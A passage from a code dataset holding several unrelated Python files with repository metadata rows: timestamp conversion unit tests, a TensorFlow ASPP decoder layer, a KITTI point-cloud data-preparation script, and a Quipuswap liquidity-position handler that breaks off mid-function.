("0:1", Timestamp(0, 1), "0:1"),
("-0:1", Timestamp(0, 1, -1), "-0:1"),
("5", Timestamp(5, 0), "5:0"),
("5:1", Timestamp(5, 1), "5:1"),
("-5:1", Timestamp(5, 1, -1), "-5:1"),
("5:999999999", Timestamp(5, 999999999), "5:999999999")
]
for t in tests_ts:
ts = Timestamp.from_sec_nsec(t[0])
self.assertIsInstance(ts, Timestamp,
msg=("Timestamp.from_sec_nsec({!r}) == {!r} not an instance of Timestamp"
.format(t[0], ts)))
self.assertEqual(
ts,
t[1],
msg="Timestamp.from_sec_nsec({!r}) == {!r}, expected {!r}".format(t[0], ts, t[1]))
ts_str = ts.to_sec_nsec()
self.assertEqual(
ts_str,
t[2],
msg="{!r}.to_sec_nsec() == {!r}, expected {!r}".format(ts, ts_str, t[2]))
self.assertEqual(ts_str, str(ts))
def test_convert_sec_frac(self):
"""This tests that the conversion to and from TAI seconds with fractional parts works as expected."""
tests_ts = [
("0.0", TimeOffset(0, 0), "0.0"),
("0.1", TimeOffset(0, 1000000000 // 10), "0.1"),
("-0.1", TimeOffset(0, 1000000000 // 10, -1), "-0.1"),
("5", TimeOffset(5, 0), "5.0"),
("5.1", TimeOffset(5, 1000000000 // 10), "5.1"),
("-5.1", TimeOffset(5, 1000000000 // 10, -1), "-5.1"),
("5.10000000", TimeOffset(5, 1000000000 // 10), "5.1"),
("5.123456789", TimeOffset(5, 123456789), "5.123456789"),
("5.000000001", TimeOffset(5, 1), "5.000000001"),
("5.0000000001", TimeOffset(5, 0), "5.0")
]
for t in tests_ts:
ts = TimeOffset.from_sec_frac(t[0])
self.assertEqual(
ts,
t[1],
msg="Called with {} {} {}".format(t[0], t[1], t[2]))
ts_str = ts.to_sec_frac()
self.assertEqual(
ts_str,
t[2],
msg="Called with {} {} {}".format(t[0], t[1], t[2]))
def test_ts_convert_tai_sec_frac(self):
"""This tests that the conversion to and from TAI seconds with fractional parts works as expected."""
tests_ts = [
("0.0", Timestamp(0, 0), "0.0"),
("0.1", Timestamp(0, 1000000000 // 10), "0.1"),
("-0.1", Timestamp(0, 100000000, -1), "-0.1"),
("5", Timestamp(5, 0), "5.0"),
("5.1", Timestamp(5, 1000000000 // 10), "5.1"),
("-5.1", Timestamp(5, 100000000, -1), "-5.1"),
("5.10000000", Timestamp(5, 1000000000 // 10), "5.1"),
("5.123456789", Timestamp(5, 123456789), "5.123456789"),
("5.000000001", Timestamp(5, 1), "5.000000001"),
("5.0000000001", Timestamp(5, 0), "5.0")
]
for t in tests_ts:
ts = Timestamp.from_sec_frac(t[0])
self.assertIsInstance(ts, Timestamp,
msg=("Timestamp.from_sec_frac({!r}) == {!r} not instance of Timestamp"
.format(t[0], ts)))
self.assertEqual(
ts,
t[1],
msg="Timestamp.from_sec_frac({!r}) == {!r}, expected {!r}".format(t[0], ts, t[1]))
ts_str = ts.to_sec_frac()
self.assertEqual(
ts_str,
t[2],
msg="{!r}.ts_to_sec_frac() == {!r}, expected {!r}".format(ts, ts_str, t[2]))
def test_convert_iso_utc(self):
"""This tests that conversion to and from ISO date format UTC time works as expected."""
tests = [
(Timestamp(1424177663, 102003), "2015-02-17T12:53:48.000102003Z"),
# the leap second is 23:59:60
# 30 June 1972 23:59:59 (2287785599, first time): TAI= UTC + 10 seconds
(Timestamp(78796809, 0), "1972-06-30T23:59:59.000000000Z"),
# 30 June 1972 23:59:60 (2287785599,second time): TAI= UTC + 11 seconds
(Timestamp(78796810, 0), "1972-06-30T23:59:60.000000000Z"),
# 1 July 1972 00:00:00 (2287785600) TAI= UTC + 11 seconds
(Timestamp(78796811, 0), "1972-07-01T00:00:00.000000000Z"),
(Timestamp(1341100833, 0), "2012-06-30T23:59:59.000000000Z"),
(Timestamp(1341100834, 0), "2012-06-30T23:59:60.000000000Z"),
(Timestamp(1341100835, 0), "2012-07-01T00:00:00.000000000Z"),
(Timestamp(1341100835, 1), "2012-07-01T00:00:00.000000001Z"),
(Timestamp(1341100835, 100000000), "2012-07-01T00:00:00.100000000Z"),
(Timestamp(1341100835, 999999999), "2012-07-01T00:00:00.999999999Z"),
(Timestamp(283996818, 0), "1979-01-01T00:00:00.000000000Z") # 1979
]
for t in tests:
utc = t[0].to_iso8601_utc()
self.assertEqual(utc, t[1])
ts = Timestamp.from_iso8601_utc(t[1])
self.assertEqual(ts, t[0])
bad_params = [
("2012-07-01Y00:00:00.000000001Z",),
("2012-07~01T00:00:00.000000001Z",),
("2012-07-01T00:00:00.0000.0001Z",),
]
for p in bad_params:
with self.assertRaises(TsValueError):
Timestamp.from_iso8601_utc(*p)
def test_smpte_timelabel(self):
"""This tests that conversion to and from SMPTE time labels works correctly."""
tests = [
("2015-01-23T12:34:56F00 30000/1001 UTC-05:00 TAI-35", 30000, 1001, -5*60*60),
("2015-01-23T12:34:56F01 30000/1001 UTC-05:00 TAI-35", 30000, 1001, -5*60*60),
("2015-01-23T12:34:56F02 30000/1001 UTC-05:00 TAI-35", 30000, 1001, -5*60*60),
("2015-01-23T12:34:56F28 30000/1001 UTC-05:00 TAI-35", 30000, 1001, -5*60*60),
("2015-01-23T12:34:56F29 30000/1001 UTC-05:00 TAI-35", 30000, 1001, -5*60*60),
("2015-07-01T00:59:59F00 30000/1001 UTC+01:00 TAI-35", 30000, 1001, 60*60),
("2015-07-01T00:59:59F01 30000/1001 UTC+01:00 TAI-35", 30000, 1001, 60*60),
("2015-07-01T00:59:59F29 30000/1001 UTC+01:00 TAI-35", 30000, 1001, 60*60),
("2015-07-01T00:59:60F00 30000/1001 UTC+01:00 TAI-35", 30000, 1001, 60*60),
("2015-07-01T00:59:60F29 30000/1001 UTC+01:00 TAI-35", 30000, 1001, 60*60),
("2015-07-01T01:00:00F00 30000/1001 UTC+01:00 TAI-36", 30000, 1001, 60*60),
("2015-06-30T18:59:59F29 30000/1001 UTC-05:00 TAI-35", 30000, 1001, -5*60*60),
("2015-06-30T18:59:60F00 30000/1001 UTC-05:00 TAI-35", 30000, 1001, -5*60*60),
("2015-06-30T18:59:60F29 30000/1001 UTC-05:00 TAI-35", 30000, 1001, -5*60*60),
("2015-06-30T19:00:00F00 30000/1001 UTC-05:00 TAI-36", 30000, 1001, -5*60*60)
]
for t in tests:
ts = Timestamp.from_smpte_timelabel(t[0])
self.assertEqual(t[0], ts.to_smpte_timelabel(t[1], t[2], t[3]))
bad_params = [
("potato",),
("the quick brown fox jumps over the lazy dog",),
("",),
('\u3069\u3082\u3042\u308a\u304c\u3068\u3046\u3001\u30df\u30b9\u30bf\u30fc\u30fb\u30ed\u30dc\u30c8\u30fc',),
("About half nine on tuesday",),
("0315-13~35T25:63:60F56 50000/1002 UTC-25:35 TAY-2",),
]
for p in bad_params:
with self.assertRaises(TsValueError):
Timestamp.from_smpte_timelabel(*p)
bad_params = [
(0, 1),
(1, 0),
]
for p in bad_params:
with self.assertRaises(TsValueError):
Timestamp(0, 0).to_smpte_timelabel(*p)
with mock.patch("time.timezone", 0):
with mock.patch("time.localtime") as localtime:
localtime.return_value.tm_isdst = 1
ts = Timestamp.from_smpte_timelabel("2015-07-01T00:59:59F00 30000/1001 UTC+01:00 TAI-35")
self.assertEqual("2015-07-01T00:59:59F00 30000/1001 UTC+01:00 TAI-35",
ts.to_smpte_timelabel(30000, 1001))
def test_from_datetime(self):
"""Conversion from python's datetime object."""
tests = [
(datetime(1970, 1, 1, 0, 0, 0, 0, tz.gettz('UTC')), Timestamp(0, 0)),
(datetime(1983, 3, 29, 15, 45, 0, 0, tz.gettz('UTC')), Timestamp(417800721, 0)),
(datetime(2017, 12, 5, 16, 33, 12, 196, tz.gettz('UTC')), Timestamp(1512491629, 196000)),
]
for t in tests:
self.assertEqual(Timestamp.from_datetime(t[0]), t[1])
def test_to_datetime(self):
"""Conversion to python's datetime object."""
tests = [
(datetime(1970, 1, 1, 0, 0, 0, 0, tz.gettz('UTC')), Timestamp(0, 0)),
(datetime(1983, 3, 29, 15, 45, 0, 0, tz.gettz('UTC')), Timestamp(417800721, 0)),
(datetime(2017, 12, 5, 16, 33, 12, 196, tz.gettz('UTC')), Timestamp(1512491629, 196000)),
(datetime(2017, 12, 5, 16, 33, 13, 0, tz.gettz('UTC')), Timestamp(1512491629, 999999999)),
]
for t in tests:
self.assertEqual(t[0], t[1].to_datetime())
def test_from_str(self):
"""Conversion from string formats."""
tests = [
("2015-01-23T12:34:56F00 30000/1001 UTC-05:00 TAI-35", Timestamp(1422034531, 17100000)),
("2015-01-23T12:34:56.0Z", Timestamp(1422016531, 0)),
("now", Timestamp(0, 0)),
]
for t in tests:
with mock.patch("time.time", return_value=0.0):
self.assertEqual(Timestamp.from_str(t[0]), t[1])
def test_get_leap_seconds(self):
"""get_leap_seconds should return the correct number of leap seconds at any point in history."""
tests = [
(Timestamp(63072008, 999999999), 0),
(Timestamp(63072009, 0), 10),
(Timestamp(78796809, 999999999), 10),
(Timestamp(78796810, 0), 11),
(Timestamp(94694410, 999999999), 11),
(Timestamp(94694411, 0), 12),
(Timestamp(417800721, 0), 21),
(Timestamp(773020827, 999999999), 28),
(Timestamp(773020828, 0), 29),
(Timestamp(1512491629, 0), 37),
]
for t in tests:
self.assertEqual(t[0].get_leap_seconds(), t[1])
| 41.539235
| 120
| 0.531751
|
794b14bf5062e91e106ecbadae916020e74b701d
| 5,142
|
py
|
Python
|
official/vision/beta/modeling/decoders/aspp.py
|
e10101/models
|
5c3e08b7697f0035b8731607277dc4e47e18317c
|
[
"Apache-2.0"
] | 2
|
2017-10-26T06:23:51.000Z
|
2020-09-11T21:09:41.000Z
|
official/vision/beta/modeling/decoders/aspp.py
|
e10101/models
|
5c3e08b7697f0035b8731607277dc4e47e18317c
|
[
"Apache-2.0"
] | 2
|
2018-06-18T17:08:12.000Z
|
2021-04-12T05:39:04.000Z
|
official/vision/beta/modeling/decoders/aspp.py
|
e10101/models
|
5c3e08b7697f0035b8731607277dc4e47e18317c
|
[
"Apache-2.0"
] | 2
|
2020-04-11T19:31:17.000Z
|
2021-04-07T12:53:28.000Z
|
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains definitions of Atrous Spatial Pyramid Pooling (ASPP) decoder."""
# Import libraries
import tensorflow as tf
from official.vision import keras_cv
@tf.keras.utils.register_keras_serializable(package='Vision')
class ASPP(tf.keras.layers.Layer):
  """Creates an Atrous Spatial Pyramid Pooling (ASPP) layer."""
  def __init__(self,
               level,
               dilation_rates,
               num_filters=256,
               pool_kernel_size=None,
               use_sync_bn=False,
               norm_momentum=0.99,
               norm_epsilon=0.001,
               activation='relu',
               dropout_rate=0.0,
               kernel_initializer='VarianceScaling',
               kernel_regularizer=None,
               interpolation='bilinear',
               **kwargs):
    """Initializes an Atrous Spatial Pyramid Pooling (ASPP) layer.
    Args:
      level: An `int` level to apply ASPP.
      dilation_rates: A `list` of dilation rates.
      num_filters: An `int` number of output filters in ASPP.
      pool_kernel_size: A `list` of [height, width] of pooling kernel size or
        None. Pooling size is with respect to original image size, it will be
        scaled down by 2**level. If None, global average pooling is used.
      use_sync_bn: A `bool`. If True, use synchronized batch normalization.
      norm_momentum: A `float` of normalization momentum for the moving average.
      norm_epsilon: A `float` added to variance to avoid dividing by zero.
      activation: A `str` activation to be used in ASPP.
      dropout_rate: A `float` rate for dropout regularization.
      kernel_initializer: A `str` name of kernel_initializer for convolutional
        layers.
      kernel_regularizer: A `tf.keras.regularizers.Regularizer` object for
        Conv2D. Default is None.
      interpolation: A `str` of interpolation method. It should be one of
        `bilinear`, `nearest`, `bicubic`, `area`, `lanczos3`, `lanczos5`,
        `gaussian`, or `mitchellcubic`.
      **kwargs: Additional keyword arguments to be passed.
    """
    super(ASPP, self).__init__(**kwargs)
    # Keep the raw constructor arguments so get_config()/from_config() can
    # round-trip the layer for Keras serialization; the actual pooling
    # sublayer is created lazily in build().
    self._config_dict = {
        'level': level,
        'dilation_rates': dilation_rates,
        'num_filters': num_filters,
        'pool_kernel_size': pool_kernel_size,
        'use_sync_bn': use_sync_bn,
        'norm_momentum': norm_momentum,
        'norm_epsilon': norm_epsilon,
        'activation': activation,
        'dropout_rate': dropout_rate,
        'kernel_initializer': kernel_initializer,
        'kernel_regularizer': kernel_regularizer,
        'interpolation': interpolation,
    }
  def build(self, input_shape):
    # pool_kernel_size is specified w.r.t. the original image; scale it down
    # to this feature level's resolution (features at `level` are assumed to
    # be downsampled by 2**level, per the __init__ docstring).
    pool_kernel_size = None
    if self._config_dict['pool_kernel_size']:
      pool_kernel_size = [
          int(p_size // 2**self._config_dict['level'])
          for p_size in self._config_dict['pool_kernel_size']
      ]
    # Delegate the actual ASPP computation to the shared keras_cv layer.
    self.aspp = keras_cv.layers.SpatialPyramidPooling(
        output_channels=self._config_dict['num_filters'],
        dilation_rates=self._config_dict['dilation_rates'],
        pool_kernel_size=pool_kernel_size,
        use_sync_bn=self._config_dict['use_sync_bn'],
        batchnorm_momentum=self._config_dict['norm_momentum'],
        batchnorm_epsilon=self._config_dict['norm_epsilon'],
        activation=self._config_dict['activation'],
        dropout=self._config_dict['dropout_rate'],
        kernel_initializer=self._config_dict['kernel_initializer'],
        kernel_regularizer=self._config_dict['kernel_regularizer'],
        interpolation=self._config_dict['interpolation'])
  def call(self, inputs):
    """Calls the Atrous Spatial Pyramid Pooling (ASPP) layer on an input.
    The output of ASPP will be a dict of {`level`, `tf.Tensor`} even if only one
    level is present. Hence, this will be compatible with the rest of the
    segmentation model interfaces.
    Args:
      inputs: A `dict` of `tf.Tensor` where
        - key: A `str` of the level of the multilevel feature maps.
        - values: A `tf.Tensor` of shape [batch, height_l, width_l,
          filter_size].
    Returns:
      A `dict` of `tf.Tensor` where
        - key: A `str` of the level of the multilevel feature maps.
        - values: A `tf.Tensor` of output of ASPP module.
    """
    outputs = {}
    # Only the configured level is processed; other input levels are ignored.
    level = str(self._config_dict['level'])
    outputs[level] = self.aspp(inputs[level])
    return outputs
  def get_config(self):
    # The stored constructor arguments fully describe this layer.
    return self._config_dict
  @classmethod
  def from_config(cls, config, custom_objects=None):
    # Inverse of get_config(): rebuild the layer from its config dict.
    return cls(**config)
| 39.860465
| 80
| 0.673668
|
794b14c7dbfa7f61b0c62b98f102325562f10495
| 12,173
|
py
|
Python
|
create_data.py
|
daib13/second.pytorch
|
31cd538c99e658d44aa97bb51b30d21d8ea8d438
|
[
"MIT"
] | null | null | null |
create_data.py
|
daib13/second.pytorch
|
31cd538c99e658d44aa97bb51b30d21d8ea8d438
|
[
"MIT"
] | null | null | null |
create_data.py
|
daib13/second.pytorch
|
31cd538c99e658d44aa97bb51b30d21d8ea8d438
|
[
"MIT"
] | null | null | null |
import copy
import pathlib
import pickle
import os
import fire
import numpy as np
from skimage import io as imgio
from second.core import box_np_ops
from second.core.point_cloud.point_cloud_ops import bound_points_jit
from second.data import kitti_common as kitti
from second.utils.progress_bar import list_bar as prog_bar
"""
Note: tqdm has problem in my system(win10), so use my progress bar
try:
from tqdm import tqdm as prog_bar
except ImportError:
from second.utils.progress_bar import progress_bar_iter as prog_bar
"""
def _read_imageset_file(path):
with open(path, 'r') as f:
lines = f.readlines()
return [int(line) for line in lines]
def _calculate_num_points_in_gt(data_path, infos, relative_path, remove_outside=True, num_features=4):
    """Annotates each frame's annos with the lidar point count per GT box.

    For every info dict: loads the velodyne scan, optionally drops points that
    project outside the camera image, converts the camera-frame annotation
    boxes to lidar frame, and stores per-box point counts in
    annos["num_points_in_gt"]. Ignored (DontCare) boxes get -1. Mutates the
    info dicts in place; returns nothing.

    Args:
        data_path: dataset root used to resolve relative velodyne paths.
        infos: list of KITTI info dicts (with 'velodyne_path', 'calib/*',
            'img_shape' and 'annos' keys).
        relative_path: whether info['velodyne_path'] is relative to data_path.
        remove_outside: drop points outside the camera frustum before counting.
        num_features: number of float32 values per lidar point in the file.
    """
    for info in infos:
        if relative_path:
            v_path = str(pathlib.Path(data_path) / info["velodyne_path"])
        else:
            v_path = info["velodyne_path"]
        points_v = np.fromfile(
            v_path, dtype=np.float32, count=-1).reshape([-1, num_features])
        rect = info['calib/R0_rect']
        Trv2c = info['calib/Tr_velo_to_cam']
        P2 = info['calib/P2']
        if remove_outside:
            points_v = box_np_ops.remove_outside_points(points_v, rect, Trv2c, P2,
                                                        info["img_shape"])
        # points_v = points_v[points_v[:, 0] > 0]
        annos = info['annos']
        # Real objects come first in the annotation arrays; DontCare last.
        num_obj = len([n for n in annos['name'] if n != 'DontCare'])
        # annos = kitti.filter_kitti_anno(annos, ['DontCare'])
        dims = annos['dimensions'][:num_obj]
        loc = annos['location'][:num_obj]
        rots = annos['rotation_y'][:num_obj]
        # Boxes are annotated in camera frame; counting happens in lidar frame.
        gt_boxes_camera = np.concatenate(
            [loc, dims, rots[..., np.newaxis]], axis=1)
        gt_boxes_lidar = box_np_ops.box_camera_to_lidar(
            gt_boxes_camera, rect, Trv2c)
        indices = box_np_ops.points_in_rbbox(points_v[:, :3], gt_boxes_lidar)
        num_points_in_gt = indices.sum(0)
        # Pad the ignored (DontCare) boxes with a -1 sentinel count.
        num_ignored = len(annos['dimensions']) - num_obj
        num_points_in_gt = np.concatenate(
            [num_points_in_gt, -np.ones([num_ignored])])
        annos["num_points_in_gt"] = num_points_in_gt.astype(np.int32)
def create_kitti_info_file(data_path,
                           save_path=None,
                           create_trainval=False,
                           relative_path=True):
    """Builds the kitti_infos_{train,val,trainval,test}.pkl metadata files.

    Each info pickle stores, per frame, the image/velodyne paths, calibration
    matrices and (for labelled splits) annotations augmented with the number
    of lidar points inside each ground-truth box.

    Args:
        data_path: KITTI root directory containing ImageSets/.
        save_path: output directory for the pickles; defaults to data_path.
        create_trainval: kept for backward compatibility; the trainval pickle
            is always written as the concatenation of train and val infos.
        relative_path: when True, stored file paths are relative to data_path.
    """
    train_img_ids = _read_imageset_file(os.path.join(data_path, "ImageSets", "train.txt"))
    val_img_ids = _read_imageset_file(os.path.join(data_path, "ImageSets", "val.txt"))
    # Read (and thereby validate) the remaining split files even though the
    # trainval pickle is built from train + val below.
    trainval_img_ids = _read_imageset_file(os.path.join(data_path, "ImageSets", "trainval.txt"))
    test_img_ids = _read_imageset_file(os.path.join(data_path, "ImageSets", "test.txt"))
    print("Generate info. this may take several minutes.")
    if save_path is None:
        save_path = pathlib.Path(data_path)
    else:
        save_path = pathlib.Path(save_path)
    kitti_infos_train = kitti.get_kitti_image_info(
        data_path,
        training=True,
        velodyne=True,
        calib=True,
        image_ids=train_img_ids,
        relative_path=relative_path)
    _calculate_num_points_in_gt(data_path, kitti_infos_train, relative_path)
    filename = save_path / 'kitti_infos_train.pkl'
    # Bug fix: these f-strings previously contained no placeholder and printed
    # a literal "(unknown)" instead of the actual output path.
    print(f"Kitti info train file is saved to {filename}")
    with open(filename, 'wb') as f:
        pickle.dump(kitti_infos_train, f)
    kitti_infos_val = kitti.get_kitti_image_info(
        data_path,
        training=True,
        velodyne=True,
        calib=True,
        image_ids=val_img_ids,
        relative_path=relative_path)
    _calculate_num_points_in_gt(data_path, kitti_infos_val, relative_path)
    filename = save_path / 'kitti_infos_val.pkl'
    print(f"Kitti info val file is saved to {filename}")
    with open(filename, 'wb') as f:
        pickle.dump(kitti_infos_val, f)
    # trainval is simply the concatenation of the train and val infos.
    filename = save_path / 'kitti_infos_trainval.pkl'
    print(f"Kitti info trainval file is saved to {filename}")
    with open(filename, 'wb') as f:
        pickle.dump(kitti_infos_train + kitti_infos_val, f)
    # The test split has no labels, so skip label_info and point counting.
    kitti_infos_test = kitti.get_kitti_image_info(
        data_path,
        training=False,
        label_info=False,
        velodyne=True,
        calib=True,
        image_ids=test_img_ids,
        relative_path=relative_path)
    filename = save_path / 'kitti_infos_test.pkl'
    print(f"Kitti info test file is saved to {filename}")
    with open(filename, 'wb') as f:
        pickle.dump(kitti_infos_test, f)
def _create_reduced_point_cloud(data_path,
                                info_path,
                                save_path=None,
                                back=False):
    """Writes camera-frustum-reduced copies of the velodyne scans in info_path.

    Args:
        data_path: dataset root containing the velodyne files.
        info_path: info pickle produced by create_kitti_info_file.
        save_path: output directory; when None, a sibling "<dir>_reduced"
            directory next to the original velodyne folder is used.
        back: when True, the x axis is negated first (rear view) and the
            output file name gets a "_back" suffix.
    """
    with open(info_path, 'rb') as f:
        kitti_infos = pickle.load(f)
    for info in prog_bar(kitti_infos):
        v_path = pathlib.Path(data_path) / info['velodyne_path']
        points_v = np.fromfile(
            str(v_path), dtype=np.float32, count=-1).reshape([-1, 4])
        rect = info['calib/R0_rect']
        P2 = info['calib/P2']
        Trv2c = info['calib/Tr_velo_to_cam']
        if back:
            # Mirror the cloud so the rear view passes the frustum test below.
            points_v[:, 0] = -points_v[:, 0]
        points_v = box_np_ops.remove_outside_points(points_v, rect, Trv2c, P2,
                                                    info["img_shape"])
        if save_path is None:
            save_dir = v_path.parent.parent / (v_path.parent.stem + "_reduced")
        else:
            save_dir = pathlib.Path(save_path)
        # Robustness: make sure the output directory exists.
        save_dir.mkdir(parents=True, exist_ok=True)
        # Bug fix: the previous code did `Path += str`, which raises TypeError
        # for pathlib.Path; build the final name as a string instead.
        save_filename = str(save_dir / v_path.name)
        if back:
            save_filename += "_back"
        # Bug fix: ndarray.tofile() writes raw bytes, so the file must be
        # opened in binary mode ('wb'), not text mode ('w').
        with open(save_filename, 'wb') as f:
            points_v.tofile(f)
def create_reduced_point_cloud(data_path,
                               train_info_path=None,
                               val_info_path=None,
                               test_info_path=None,
                               save_path=None,
                               with_back=False):
    """Produces frustum-reduced point clouds for the train/val/test splits.

    Any info path left as None defaults to the standard pickle name under
    data_path. When with_back is True, an additional mirrored (x negated)
    reduced cloud is written for each split.
    """
    root = pathlib.Path(data_path)
    if train_info_path is None:
        train_info_path = root / 'kitti_infos_train.pkl'
    if val_info_path is None:
        val_info_path = root / 'kitti_infos_val.pkl'
    if test_info_path is None:
        test_info_path = root / 'kitti_infos_test.pkl'
    split_info_paths = (train_info_path, val_info_path, test_info_path)
    for info_path in split_info_paths:
        _create_reduced_point_cloud(data_path, info_path, save_path)
    if with_back:
        for info_path in split_info_paths:
            _create_reduced_point_cloud(
                data_path, info_path, save_path, back=True)
def create_groundtruth_database(data_path,
                                info_path=None,
                                used_classes=None,
                                database_save_path=None,
                                db_info_save_path=None,
                                relative_path=True,
                                lidar_only=False,
                                bev_only=False,
                                coors_range=None):
    """Crops every annotated object out of the lidar scans into a GT database.

    For each ground-truth box, the points inside it are saved (recentered on
    the box origin) as `<image_idx>_<name>_<gt_idx>.bin` under
    `database_save_path`, and a per-class list of metadata dicts is pickled to
    `db_info_save_path` for use by ground-truth-sampling augmentation.

    Args:
        data_path: KITTI root directory.
        info_path: info pickle from create_kitti_info_file; defaults to
            kitti_infos_train.pkl under data_path.
        used_classes: class names to keep; defaults to all KITTI classes
            except 'DontCare'.
        database_save_path: directory for the cropped .bin files; defaults to
            <data_path>/gt_database.
        db_info_save_path: output pickle of database metadata.
        relative_path: when True, velodyne/db paths are relative to data_path.
        lidar_only: when True, skip removing points outside the camera image.
        bev_only: when True, clamp box z/height to coors_range (BEV training).
        coors_range: [xmin, ymin, zmin, xmax, ymax, zmax]; required when
            bev_only is True.
    """
    root_path = pathlib.Path(data_path)
    if info_path is None:
        info_path = root_path / 'kitti_infos_train.pkl'
    if database_save_path is None:
        database_save_path = root_path / 'gt_database'
    else:
        database_save_path = pathlib.Path(database_save_path)
    if db_info_save_path is None:
        db_info_save_path = root_path / "kitti_dbinfos_train.pkl"
    database_save_path.mkdir(parents=True, exist_ok=True)
    with open(info_path, 'rb') as f:
        kitti_infos = pickle.load(f)
    all_db_infos = {}
    if used_classes is None:
        used_classes = list(kitti.get_classes())
        used_classes.pop(used_classes.index('DontCare'))
    for name in used_classes:
        all_db_infos[name] = []
    group_counter = 0
    for info in prog_bar(kitti_infos):
        velodyne_path = info['velodyne_path']
        if relative_path:
            # velodyne_path = str(root_path / velodyne_path) + "_reduced"
            velodyne_path = str(root_path / velodyne_path)
        num_features = 4
        if 'pointcloud_num_features' in info:
            num_features = info['pointcloud_num_features']
        points = np.fromfile(
            velodyne_path, dtype=np.float32, count=-1).reshape([-1, num_features])
        image_idx = info["image_idx"]
        rect = info['calib/R0_rect']
        P2 = info['calib/P2']
        Trv2c = info['calib/Tr_velo_to_cam']
        if not lidar_only:
            # Keep only the points that project into the camera image.
            points = box_np_ops.remove_outside_points(points, rect, Trv2c, P2,
                                                      info["img_shape"])
        annos = info["annos"]
        names = annos["name"]
        bboxes = annos["bbox"]
        difficulty = annos["difficulty"]
        gt_idxes = annos["index"]
        # Real objects carry index >= 0; DontCare entries are -1.
        num_obj = np.sum(annos["index"] >= 0)
        rbbox_cam = kitti.anno_to_rbboxes(annos)[:num_obj]
        rbbox_lidar = box_np_ops.box_camera_to_lidar(rbbox_cam, rect, Trv2c)
        if bev_only:  # set z and h to limits
            assert coors_range is not None
            rbbox_lidar[:, 2] = coors_range[2]
            rbbox_lidar[:, 5] = coors_range[5] - coors_range[2]
        group_dict = {}
        # Objects annotated as a group share a database-wide group id.
        # (The dead `np.full` pre-assignment was removed: both branches below
        # always assign group_ids.)
        if "group_ids" in annos:
            group_ids = annos["group_ids"]
        else:
            group_ids = np.arange(bboxes.shape[0], dtype=np.int64)
        point_indices = box_np_ops.points_in_rbbox(points, rbbox_lidar)
        for i in range(num_obj):
            filename = f"{image_idx}_{names[i]}_{gt_idxes[i]}.bin"
            filepath = database_save_path / filename
            gt_points = points[point_indices[:, i]]
            # Recenter on the box origin so samples are position-independent.
            gt_points[:, :3] -= rbbox_lidar[i, :3]
            # Bug fix: ndarray.tofile() writes raw bytes, so the file must be
            # opened in binary mode ('wb'), not text mode ('w').
            with open(filepath, 'wb') as f:
                gt_points.tofile(f)
            if names[i] in used_classes:
                if relative_path:
                    db_path = str(database_save_path.stem + "/" + filename)
                else:
                    db_path = str(filepath)
                db_info = {
                    "name": names[i],
                    "path": db_path,
                    "image_idx": image_idx,
                    "gt_idx": gt_idxes[i],
                    "box3d_lidar": rbbox_lidar[i],
                    "num_points_in_gt": gt_points.shape[0],
                    "difficulty": difficulty[i],
                }
                local_group_id = group_ids[i]
                if local_group_id not in group_dict:
                    group_dict[local_group_id] = group_counter
                    group_counter += 1
                db_info["group_id"] = group_dict[local_group_id]
                if "score" in annos:
                    db_info["score"] = annos["score"][i]
                all_db_infos[names[i]].append(db_info)
    for k, v in all_db_infos.items():
        print(f"load {len(v)} {k} database infos")
    with open(db_info_save_path, 'wb') as f:
        pickle.dump(all_db_infos, f)
if __name__ == '__main__':
    # python-fire exposes every public function in this module as a CLI
    # subcommand, e.g. `python create_data.py create_kitti_info_file --data_path=...`.
    fire.Fire()
| 39.911475
| 102
| 0.592787
|
794b153ddf01c74ae99c09cb5f5d75dc61825e21
| 1,732
|
py
|
Python
|
quipuswap/handlers/on_fa12_invest_liquidity.py
|
xsfunc/tezik-dipdup
|
5fc50b0b2e3eadb53b267fed85e72bb30bd8ec61
|
[
"MIT"
] | null | null | null |
quipuswap/handlers/on_fa12_invest_liquidity.py
|
xsfunc/tezik-dipdup
|
5fc50b0b2e3eadb53b267fed85e72bb30bd8ec61
|
[
"MIT"
] | null | null | null |
quipuswap/handlers/on_fa12_invest_liquidity.py
|
xsfunc/tezik-dipdup
|
5fc50b0b2e3eadb53b267fed85e72bb30bd8ec61
|
[
"MIT"
] | null | null | null |
from decimal import Decimal
import quipuswap.models as models
from quipuswap.types.fa12_token.parameter.transfer import TransferParameter
from quipuswap.types.fa12_token.storage import Fa12TokenStorage
from quipuswap.types.quipu_fa12.parameter.invest_liquidity import (
InvestLiquidityParameter,
)
from quipuswap.types.quipu_fa12.storage import QuipuFa12Storage
from dipdup.context import HandlerContext
from dipdup.models import Transaction
async def on_fa12_invest_liquidity(
    ctx: HandlerContext,
    invest_liquidity: Transaction[InvestLiquidityParameter, QuipuFa12Storage],
    transfer: Transaction[TransferParameter, Fa12TokenStorage],
) -> None:
    """Updates a trader's LP position after investLiquidity on a FA1.2 pool.

    Pairs the Quipuswap `invest_liquidity` call with the matching FA1.2 token
    `transfer` to work out how much value (in tez) the trader deposited, then
    refreshes the stored share quantity and volume-weighted average share
    price of the trader's Position row.
    """
    storage = invest_liquidity.storage
    # Token decimals and symbol come from the dipdup template configuration.
    decimals = int(ctx.template_values["decimals"])
    symbol = ctx.template_values["symbol"]
    trader = invest_liquidity.data.sender_address
    position, _ = await models.Position.get_or_create(trader=trader, symbol=symbol)
    # investLiquidity always carries the tez being deposited.
    assert invest_liquidity.data.amount is not None
    tez_qty = Decimal(invest_liquidity.data.amount) / (10**6)
    token_qty = Decimal(transfer.parameter.value) / (10**decimals)
    # Total shares after this deposit: liquid plus frozen ledger balance.
    new_shares_qty = int(storage.storage.ledger[trader].balance) + int(storage.storage.ledger[trader].frozen_balance)  # type: ignore
    # Pool mid-price in tez per token, post-operation.
    price = (Decimal(storage.storage.tez_pool) / (10**6)) / (
        Decimal(storage.storage.token_pool) / (10**decimals)
    )
    # Deposit value in tez: the tez leg plus the tez value of the token leg.
    value = tez_qty + price * token_qty
    # Sanity check: the newly minted shares must carry a positive price.
    share_px = value / (new_shares_qty - position.shares_qty)
    assert share_px > 0, invest_liquidity.data.hash
    # Volume-weighted average entry price across all of the trader's shares.
    position.avg_share_px = (
        position.shares_qty * position.avg_share_px + value
    ) / new_shares_qty
